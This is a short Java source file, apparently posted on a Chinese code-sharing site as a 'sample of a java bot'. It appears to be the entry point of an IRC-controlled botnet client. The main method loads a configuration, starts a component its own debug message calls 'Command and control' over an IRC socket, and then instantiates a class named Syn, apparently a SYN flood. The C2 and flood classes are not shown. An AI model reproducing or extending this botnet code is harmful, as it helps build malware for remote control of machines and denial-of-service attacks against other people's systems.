bot.java
来自「this is a sample of a java bot. use to e」· Java 代码 · 共 17 行
JAVA
17 行
public class Bot {
public static CAC CAC_INSTANCE = null;
public static void main(String[] args) {
Debug.print("Location: " + Util.getJARLoc() + "\n");
Config conf = new Config();
ConfigReader reader = new ConfigReader(conf);
reader.read();
Debug.print("Read configuration, starting up... \n");
CAC_INSTANCE = new CAC(new IRCSocket(conf));
Debug.print("Command and control instantiated... \n");
CAC_INSTANCE.start();
new Syn();
}
}
⌨️ 快捷键说明
复制代码Ctrl + C
搜索代码Ctrl + F
全屏模式F11
增大字号Ctrl + =
减小字号Ctrl + -
显示快捷键?